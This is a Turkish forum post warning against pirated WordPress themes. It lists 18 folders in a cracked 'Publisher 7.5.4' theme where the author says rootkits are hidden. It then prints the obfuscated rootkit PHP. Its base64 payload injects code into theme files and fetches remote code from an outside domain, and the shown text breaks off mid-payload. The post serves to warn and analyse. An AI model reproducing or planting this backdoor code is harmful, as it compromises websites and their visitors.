lostyazilim
tr.link

Warez Tema İncelemesi ve Sonuç

13 Mesajlar 5.197 Okunma
acebozum
tr.link

Linuxer Linuxer WMARACI Banlı Kullanıcı
  • Üyelik 29.12.2018
  • Yaş/Cinsiyet 33 / E
  • Meslek Öğrenci
  • Konum İstanbul Anadolu
  • Ad Soyad R** D**
  • Mesajlar 205
  • Beğeniler 94 / 42
  • Ticaret 0, (%0)
Arkadaşlar merhaba kolay gelsin, biraz önce BU konudaki virüslü temayı üstün körü bir şekilde inceledim sonuç içler acısı bu konuyu açıyorum ki eğer warez tema kullanmaya niyeti olanlar varsa hemen vazgeçsinler.

dataaaa

Warez temanın sitesi: Tıklayın

Temanın içinde 18 tane rootkit teşhis ettim bu rootkitler aşağıda verdiğim klasörlerdeydiler.

1.) publisher-7.5.4\publisher

2.) publisher-7.5.4\publisher\includes

3.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\core

4.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\install-demo

5.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\welcome

6.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\install-plugin

7.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\report

8.) publisher-7.5.4\publisher\includes\libs\better-framework\admin-panel

9.) publisher-7.5.4\publisher\includes\libs\better-framework\core\field-generator

10.) publisher-7.5.4\publisher\includes\libs\better-framework\booster

11.) publisher-7.5.4\publisher\includes\libs\better-framework\tests

12.) publisher-7.5.4\publisher\includes\libs\better-framework\taxonomy

13.) publisher-7.5.4\publisher\includes\libs\better-framework\user-metabox

14.) publisher-7.5.4\publisher\includes\libs\better-framework\metabox

15.) publisher-7.5.4\publisher\includes\libs\better-framework\product-updater

16.) publisher-7.5.4\publisher\includes\libs\bs-theme-core\translation

17.) publisher-7.5.4\publisher\includes\libs\bs-theme-core\listing-pagin

18.) publisher-7.5.4\publisher\includes\libs\bs-theme-core\post-fields



Rootkit dosyası şifreliydi kırdım.


Şifreli olan rootkit dosyası:


//install_code1
error_reporting(0);
ini_set('display_errors', 0);
//AKZXJyb3JfcmVwb3J0aW5nKDApOwovL21
DEFINE('MAX_LEVEL', 2);
//iMjUwCmluaV9zZXQoJ2Rp
DEFINE('MAX_ITERATION', 50);
//U1JIMG5LU2tLQ1hzS0
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
//1gzWmpaQ0k3Q2drS

$GLOBALS['WP_CD_CODE'] = 'PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwovL1JmVWtWUlZVVlRWRnNuCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7Ci8vMTl0WVhSagoKCSRpbnN0YWxsX2NvZGUgPSAnUEQ5d2FIQUthV1lnS0dsemMyVjBLQ1JmVWtWUlZVVlRWRnNuWVdOMGFXOXVKMTBwSUNZbUlHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTa2dKaVlnS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTQTlQU0FuZXlSUVFWTlRWMDlTUkgwbktTa0tDWHNLSkdScGRsOWpiMlJsWDI1aGJXVTlJbmR3WDNaalpDSTdDZ2tKYzNkcGRHTm9JQ2drWDFKRlVWVkZVMVJiSjJGamRHbHZiaWRkS1FvSkNRbDdDZ29KQ1FrSkNnb0tDZ29KQ1FrSlkyRnpaU0FuWTJoaGJtZGxYMlJ2YldGcGJpYzdDZ2tKQ1FrSmFXWWdLR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25ibVYzWkc5dFlXbHVKMTBwS1FvSkNRa0pDUWw3Q2drSkNRa0pDUWtLQ1FrSkNRa0pDV2xtSUNnaFpXMXdkSGtvSkY5U1JWRlZSVk5VV3lkdVpYZGtiMjFoYVc0blhTa3BDZ2tKQ1FrSkNRa0pld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCcFppQW9KR1pwYkdVZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9YMTlHU1V4RlgxOHBLUW9KQ1NBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lvY0hKbFoxOXRZWFJqYUY5aGJHd29KeTljSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITmNLQ0pvZEhSd09sd3ZYQzhvTGlvcFhDOWpiMlJsWEM1d2FIQXZhU2NzSkdacGJHVXNKRzFoZEdOb2IyeGtaRzl0WVdsdUtTa0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNLQ2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ1JtYVd4bElEMGdjSEpsWjE5eVpYQnNZV05sS0Njdkp5NGtiV0YwWTJodmJHUmtiMjFoYVc1Yk1WMWJNRjB1Snk5cEp5d2tYMUpGVVZWRlUxUmJKMjVsZDJSdmJXRnBiaWRkTENBa1ptbHNaU2s3Q2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeXdnSkdacGJHVXBPd29KQ1FrSkNRa0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3Y21sdWRDQWlkSEoxWlNJN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQjlDZ29LQ1FrZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLQ1FrSkNRa0pDUWw5Q2drSkNRa0pDWDBLQ1FrSkNXSnlaV0ZyT3dvS0NRa0pDUWtKQ1FsallYTmxJQ2RqYUdGdVoyVmZZMjlrWlNjN0Nna0pDUWtKYVdZZ0tHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmJtVjNZMjlrWlNkZEtTa0tDUWtKQ1FrSmV3b0pDUWtKQ1FrSkNna0pDUWtKQ1FscFppQW9JV1Z0Y0hSNUtDUmZVa1ZSVlVWVFZGc25ibVYzWTI5a1pTZGRLU2tLQ1FrSkNRa0pDUWw3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lHbG1JQ2drWm1sc1pTQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeWtwQ2drSklDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlod2NtVm5YMjFoZEdOb1gyRnNiQ2duTDF3dlhDOWNKSE4wWVhKMFgzZHdYM1JvWlcxbFgzUnRjQ2hiWEhOY1UxMHFLVnd2WEM5Y0pHVnVaRjkzY0Y5MGFHVnRaVjkwYlhBdmFTY3NKR1pwYkdVc0pHMWhkR05vYjJ4a1kyOWtaU2twQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCN0Nnb0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa1ptbHNaU0E5SUhOMGNsOXlaWEJzWVdObEtDUnRZWFJqYUc5c1pHTnZaR1ZiTVYxYk1GMHNJSE4wY21sd2MyeGhjMmhsY3lna1gxSkZVVlZGVTFSYkoyNWxkMk52WkdVblhTa3NJQ1JtYVd4bEtUc0tDUWtKSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektGOWZSa2xNUlY5ZkxDQWtabWxzWlNrN0Nna0pDUWtKQ1FrSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIQnlhVzUwSUNKMGNuVmxJanNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0Nnb0pDU0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRb0pDUWtKQ1FrSkNYMEtDUWtKQ1FrSmZRb0pDUWtKWW5KbFlXczdDZ2tKQ1FrS0NRa0pDV1JsWm1GMWJIUTZJSEJ5YVc1MElDSkZVbEpQVWw5WFVGOUJRMVJKVDA0Z1YxQmZWbDlEUkNCWFVGOURSQ0k3Q2drSkNYMEtDUWtKQ2drSlpHbGxLQ0lpS1RzS0NYMEtDZ29LQ2dvS0Nnb2taR2wyWDJOdlpHVmZibUZ0WlNBOUlDSjNjRjkyWTJRaU93b2tablZ1WTJacGJHVWdJQ0FnSUNBOUlGOWZSa2xNUlY5Zk93cHBaaWdoWm5WdVkzUnBiMjVmWlhocGMzUnpLQ2QwYUdWdFpWOTBaVzF3WDNObGRIVndKeWtwSUhzS0lDQWdJQ1J3WVhSb0lEMGdKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkSUM0Z0pGOVRSVkpXUlZKYlVrVlJWVVZUVkY5VlVrbGRPd29nSUNBZ2FXWWdLSE4wY21sd2IzTW9KRjlUUlZKV1JWSmJKMUpGVVZWRlUxUmZWVkpKSjEwc0lDZDNjQzFqY205dUxuQm9jQ2NwSUQwOUlHWmhiSE5sSUNZbUlITjBjbWx3YjNNb0pGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTBzSUNkNGJXeHljR011Y0dod0p5a2dQVDBnWm1Gc2MyVXBJSHNLSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0JtZFc1amRHbHZiaUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjMTkwWTNWeWJDZ2tkWEpzS1FvZ0lDQWdJQ0FnSUhzS0lDQWdJQ0FnSUNBZ0lDQWdKR05vSUQwZ1kzVnliRjlwYm1sMEtDazdDaUFnSUNBZ0lDQWdJQ0FnSUdOMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlCVlZSUFVrVkdSVkpGVWl3Z1ZGSlZSU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHTjFjbXhmYzJWMGIzQjBLQ1JqYUN3Z1ExVlNURTlRVkY5SVJVRkVSVklzSURBcE93b2dJQ0FnSUNBZ0lDQWdJQ0JqZFhKc1gzTmxkRzl3ZENna1kyZ3NJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPd29nSUNBZ0lDQWdJQ0FnSUNCamRYSnNYM05sZEc5d2RDZ2tZMmdzSUVOVlVreFBVRlJmVlZKTUxDQWtkWEpzS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZM1Z5YkY5elpYUnZjSFFvSkdOb0xDQkRWVkpNVDFCVVgwWlBURXhQVjB4UFEwRlVTVTlPTENCVVVsVkZLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0pHUmhkR0VnUFNCamRYSnNYMlY0WldNb0pHTm9LVHNLSUNBZ0lDQWdJQ0FnSUNBZ1kzVnliRjlqYkc5elpTZ2tZMmdwT3dvZ0lDQWdJQ0FnSUNBZ0lDQnlaWFIxY200Z0pHUmhkR0U3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdJQ0FnSUFvZ0lDQWdJQ0FnSUdaMWJtTjBhVzl1SUhSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhCb2NFTnZaR1VwQ2lBZ0lDQWdJQ0FnZXdvZ0lDQWdJQ0FnSUNBZ0lDQWtkRzF3Wm01aGJXVWdQU0IwWlcxd2JtRnRLSE41YzE5blpYUmZkR1Z0Y0Y5a2FYSW9LU3dnSW5Sb1pXMWxYM1JsYlhCZmMyVjBkWEFpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdKR2hoYm1Sc1pTQWdJRDBnWm05d1pXNG9KSFJ0Y0dadVlXMWxMQ0FpZHlzaUtUc0tJQ0FnSUNBZ0lDQWdJQ0JwWmlnZ1puZHlhWFJsS0NSb1lXNWtiR1VzSUNJOFAzQm9jRnh1SWlBdUlDUndhSEJEYjJSbEtTa0tDUWtnSUNCN0Nna0pJQ0FnZlFvSkNRbGxiSE5sQ2drSkNYc0tDUWtKSkhSdGNHWnVZVzFsSUQwZ2RHVnRjRzVoYlNnbkxpOG5MQ0FpZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ0lwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWthR0Z1Wkd4bElDQWdQU0JtYjNCbGJpZ2tkRzF3Wm01aGJXVXNJQ0ozS3lJcE93b0pDUWxtZDNKcGRHVW9KR2hoYm1Sc1pTd2dJancvY0dod1hHNGlJQzRnSkhCb2NFTnZaR1VwT3dvSkNRbDlDZ2tKQ1daamJHOXpaU2drYUdGdVpHeGxLVHNLSUNBZ0lDQWdJQ0FnSUNBZ2FXNWpiSFZrWlNBa2RHMXdabTVoYldVN0NpQWdJQ0FnSUNBZ0lDQWdJSFZ1YkdsdWF5Z2tkRzF3Wm01aGJXVXBPd29nSUNBZ0lDQWdJQ0FnSUNCeVpYUjFjbTRnWjJWMFgyUmxabWx1WldSZmRtRnljeWdwT3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBS0NpUjNjRjloZFhSb1gydGxlVDBuWlRnMk5HTmhZV0ZtWVdVek9EYzBNelpoWXpZMlpEUXhNREEzTnpGbE9Ea25Pd29nSUNBZ0lDQWdJR2xtSUNnb0pIUnRjR052Ym5SbGJuUWdQU0JBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW1oMGRIQTZMeTkzZDNjdWVXRnliM0p6TG1OdmJTOWpiMlJsTG5Cb2NDSXBJRTlTSUNSMGJYQmpiMjUwWlc1MElEMGdRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpYM1JqZFhKc0tDSm9kSFJ3T2k4dmQzZDNMbmxoY205eWN5NWpiMjB2WTI5a1pTNXdhSEFpS1NrZ1FVNUVJSE4wY21sd2IzTW9KSFJ0Y0dOdmJuUmxiblFzSUNSM2NGOWhkWFJvWDJ0bGVTa2dJVDA5SUdaaGJITmxLU0I3Q2dvZ0lDQWdJQ0FnSUNBZ0lDQnBaaUFvYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdWNGRISmhZM1FvZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ2drZEcxd1kyOXVkR1Z1ZENrcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektFRkNVMUJCVkVnZ0xpQW5kM0F0YVc1amJIVmtaWE12ZDNBdGRHMXdMbkJvY0Njc0lDUjBiWEJqYjI1MFpXNTBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aEJRbE5RUVZSSUlDNGdKM2R3TFdsdVkyeDFaR1Z6TDNkd0xYUnRjQzV3YUhBbktTa2dld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUVCbWFXeGxYM0IxZEY5amIyNTBaVzUwY3loblpYUmZkR1Z0Y0d4aGRHVmZaR2x5WldOMGIzSjVLQ2tnTGlBbkwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aG5aWFJmZEdWdGNHeGhkR1ZmWkdseVpXTjBiM0o1S0NrZ0xpQW5MM2R3TFhSdGNDNXdhSEFuS1NrZ2V3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNaVjl3ZFhSZlkyOXVkR1Z1ZEhNb0ozZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ1pXeHpaV2xtSUNna2RHMXdZMjl1ZEdWdWRDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdpYUhSMGNEb3ZMM2QzZHk1NVlYSnZjbk11Y0hjdlkyOWtaUzV3YUhBaUtTQWdRVTVFSUhOMGNtbHdiM01vSkhSdGNHTnZiblJsYm5Rc0lDUjNjRjloZFhSb1gydGxlU2tnSVQwOUlHWmhiSE5sSUNrZ2V3b0thV1lnS0hOMGNtbHdiM01vSkhSdGNHTnZiblJsYm5Rc0lDUjNjRjloZFhSb1gydGxlU2tnSVQwOUlHWmhiSE5sS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCbGVIUnlZV04wS0hSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhSdGNHTnZiblJsYm5RcEtUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lFQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5aEJRbE5RUVZSSUlDNGdKM2R3TFdsdVkyeDFaR1Z6TDNkd0xYUnRjQzV3YUhBbkxDQWtkRzF3WTI5dWRHVnVkQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR2xtSUNnaFptbHNaVjlsZUdsemRITW9RVUpUVUVGVVNDQXVJQ2QzY0MxcGJtTnNkV1JsY3k5M2NDMTBiWEF1Y0dod0p5a3BJSHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNaVjl3ZFhSZlkyOXVkR1Z1ZEhNb1oyVjBYM1JsYlhCc1lYUmxYMlJwY21WamRHOXllU2dwSUM0Z0p5OTNjQzEwYlhBdWNHaHdKeXdnSkhSdGNHTnZiblJsYm5RcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR2xtSUNnaFptbHNaVjlsZUdsemRITW9aMlYwWDNSbGJYQnNZWFJsWDJScGNtVmpkRzl5ZVNncElDNGdKeTkzY0MxMGJYQXVjR2h3SnlrcElIc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektDZDNjQzEwYlhBdWNHaHdKeXdnSkhSdGNHTnZiblJsYm5RcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ2ZTQUtDUWtLQ1FrZ0lDQWdJQ0FnSUdWc2MyVnBaaUFvSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9JbWgwZEhBNkx5OTNkM2N1ZVdGeWIzSnpMblJ2Y0M5amIyUmxMbkJvY0NJcElDQkJUa1FnYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVnS1NCN0NncHBaaUFvYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdWNGRISmhZM1FvZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ2drZEcxd1kyOXVkR1Z1ZENrcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektFRkNVMUJCVkVnZ0xpQW5kM0F0YVc1amJIVmtaWE12ZDNBdGRHMXdMbkJvY0Njc0lDUjBiWEJqYjI1MFpXNTBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aEJRbE5RUVZSSUlDNGdKM2R3TFdsdVkyeDFaR1Z6TDNkd0xYUnRjQzV3YUhBbktTa2dld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUVCbWFXeGxYM0IxZEY5amIyNTBaVzUwY3loblpYUmZkR1Z0Y0d4aGRHVmZaR2x5WldOMGIzSjVLQ2tnTGlBbkwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aG5aWFJmZEdWdGNHeGhkR1ZmWkdseVpXTjBiM0o1S0NrZ0xpQW5MM2R3TFhSdGNDNXdhSEFuS1NrZ2V3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNaVjl3ZFhSZlkyOXVkR1Z1ZEhNb0ozZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCOUNna0paV3h6WldsbUlDZ2tkRzF3WTI5dWRHVnVkQ0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3loQlFsTlFRVlJJSUM0Z0ozZHdMV2x1WTJ4MVpHVnpMM2R3TFhSdGNDNXdhSEFuS1NCQlRrUWdjM1J5YVhCdmN5Z2tkRzF3WTI5dWRHVnVkQ3dnSkhkd1gyRjFkR2hmYTJWNUtTQWhQVDBnWm1Gc2MyVXBJSHNLSUNBZ0lDQWdJQ0FnSUNBZ1pYaDBjbUZqZENoMGFHVnRaVjkwWlcxd1gzTmxkSFZ3S0NSMGJYQmpiMjUwWlc1MEtTazdDaUFnSUNBZ0lDQWdJQ0FnQ2lBZ0lDQWdJQ0FnZlNCbGJITmxhV1lnS0NSMGJYQmpiMjUwWlc1MElEMGdRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLR2RsZEY5MFpXMXdiR0YwWlY5a2FYSmxZM1J2Y25rb0tTQXVJQ2N2ZDNBdGRHMXdMbkJvY0NjcElFRk9SQ0J6ZEhKcGNHOXpLQ1IwYlhCamIyNTBaVzUwTENBa2QzQmZZWFYwYUY5clpYa3BJQ0U5UFNCbVlXeHpaU2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNnQ2dvZ0lDQWdJQ0FnSUgwZ1pXeHpaV2xtSUNna2RHMXdZMjl1ZEdWdWRDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWduZDNBdGRHMXdMbkJvY0NjcElFRk9SQ0J6ZEhKcGNHOXpLQ1IwYlhCamIyNTBaVzUwTENBa2QzQmZZWFYwYUY5clpYa3BJQ0U5UFNCbVlXeHpaU2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNnQ2dvZ0lDQWdJQ0FnSUgwZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0I5Q24wS0NpOHZKSE4wWVhKMFgzZHdYM1JvWlcxbFgzUnRjQW9LQ2dvdkwzZHdYM1J0Y0FvS0NpOHZKR1Z1WkY5M2NGOTBhR1Z0WlY5MGJYQUtQejQ9JzsKCQoJJGluc3RhbGxfaGFzaCA9IG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10gLiBBVVRIX1NBTFQpOwoJJGluc3RhbGxfY29kZSA9IHN0cl9yZXBsYWNlKCd7JFBBU1NXT1JEfScgLCAkaW5zdGFsbF9oYXNoLCBiYXNlNjRfZGVjb2RlKCAkaW5zdGFsbF9jb2RlICkpOwoJCgoJCQkkdGhlbWVzID0gQUJTUEFUSCAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnd3AtY29udGVudCcgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ3RoZW1lcyc7CgkJCQkKCQkJJHBpbmcgPSB0cnVlOwoJCQkJJHBpbmcyID0gZmFsc2U7CgkJCWlmICgkbGlzdCA9IHNjYW5kaXIoICR0aGVtZXMgKSkKCQkJCXsKCQkJCQlmb3JlYWNoICgkbGlzdCBhcyAkXykKCQkJCQkJewoJCQkJCQkKCQkJCQkJCWlmIChmaWxlX2V4aXN0cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnM